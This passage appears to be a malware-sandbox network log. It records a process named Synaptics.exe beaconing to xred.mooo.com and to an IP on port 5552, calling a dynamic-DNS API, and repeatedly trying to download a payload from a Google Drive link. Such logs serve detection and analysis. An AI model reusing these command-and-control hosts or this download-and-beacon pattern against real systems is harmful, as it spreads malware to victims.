                                                                                                                                                      Dec 30, 2024 11:26:55.234601021 CET555250148172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:02.067910910 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:02.073318958 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:02.073724985 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:02.074136972 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:02.079438925 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:04.202567101 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:04.204536915 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:04.357790947 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:04.362580061 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:11.130283117 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:11.135232925 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:11.135335922 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:11.135834932 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:11.140701056 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:13.268107891 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:13.268174887 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:13.276967049 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:13.281816959 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:20.193216085 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:20.198203087 CET555250151172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:20.198323965 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:20.198693037 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:20.203527927 CET555250151172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:22.326292038 CET555250151172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:22.326443911 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:22.401516914 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:22.406456947 CET555250151172.111.138.100192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:25:28.577290058 CET | 192.168.2.11 | 1.1.1.1 | 0x329a | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:29.332200050 CET | 192.168.2.11 | 1.1.1.1 | 0x5cf1 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:29.563576937 CET | 192.168.2.11 | 1.1.1.1 | 0x976d | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:30.018539906 CET | 192.168.2.11 | 1.1.1.1 | 0x9888 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:33.852538109 CET | 192.168.2.11 | 1.1.1.1 | 0xb09f | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:39.537209034 CET | 192.168.2.11 | 1.1.1.1 | 0x6b78 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:44.303896904 CET | 192.168.2.11 | 1.1.1.1 | 0xab73 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:49.977374077 CET | 192.168.2.11 | 1.1.1.1 | 0xb4c4 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:54.716708899 CET | 192.168.2.11 | 1.1.1.1 | 0xfd71 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:25:28.583918095 CET | 1.1.1.1 | 192.168.2.11 | 0x329a | No error (0) | docs.google.com |  | 172.217.18.110 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:29.339827061 CET | 1.1.1.1 | 192.168.2.11 | 0x5cf1 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:29.571126938 CET | 1.1.1.1 | 192.168.2.11 | 0x976d | No error (0) | freedns.afraid.org |  | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:30.027192116 CET | 1.1.1.1 | 192.168.2.11 | 0x9888 | No error (0) | drive.usercontent.google.com |  | 142.250.181.225 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:33.860358000 CET | 1.1.1.1 | 192.168.2.11 | 0xb09f | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:39.544121027 CET | 1.1.1.1 | 192.168.2.11 | 0x6b78 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:44.311129093 CET | 1.1.1.1 | 192.168.2.11 | 0xab73 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:49.984791994 CET | 1.1.1.1 | 192.168.2.11 | 0xb4c4 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:54.724001884 CET | 1.1.1.1 | 192.168.2.11 | 0xfd71 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                      • docs.google.com
                                                                                                                                                      • drive.usercontent.google.com
                                                                                                                                                      • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49769 | 69.42.215.252 | 80 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:25:29.590995073 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                      User-Agent: MyApp
                                                                                                                                                      Host: freedns.afraid.org
                                                                                                                                                      Cache-Control: no-cache
Dec 30, 2024 11:25:30.160239935 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      X-Cache: MISS
                                                                                                                                                      Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49761 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:25:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-t-GYB-nshLIcZbAs_SDSVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      1 | 192.168.2.11 | 49762 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ugYRQS8AtO7RjYSwSJlpPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      2 | 192.168.2.11 | 49775 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:30 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xrgjVyWloGlw4dSXHt023g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      3 | 192.168.2.11 | 49776 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:30 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-s-W3Iy3vLYPE8vZr59oW2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      4 | 192.168.2.11 | 49777 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:30 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:31 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7i4MQtD9Ake8Wr9tEyyzKob5HgInf11gkcX8rtRC9q6QwrsjCZgMvIS1LlO2jdfQje
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HvIfQy8YkY4HDxDIZggC9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL; expires=Tue, 01-Jul-2025 10:25:30 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:31 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oorkudULhBzrOXA2kXypSg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:31 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      5 | 192.168.2.11 | 49778 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:30 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:31 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6j55qK_y6oQQV458QiXo80s2gdu4r-lYkJHRlTVUYK3rhSviOGeuHNQw4jgxA-gGnW
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zo98B5bG0X0E5uvAstvLog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:31 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L6_mTOJx_oL0ZCf3YrhXpQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:31 UTC | 58 | IN | Data Ascii: nd on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      6 | 192.168.2.11 | 49787 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EmuqORgLzIEXkRccdf4tlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      7 | 192.168.2.11 | 49788 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-z1RGsgZOBfVRPymUrHBBTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      8 | 192.168.2.11 | 49789 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
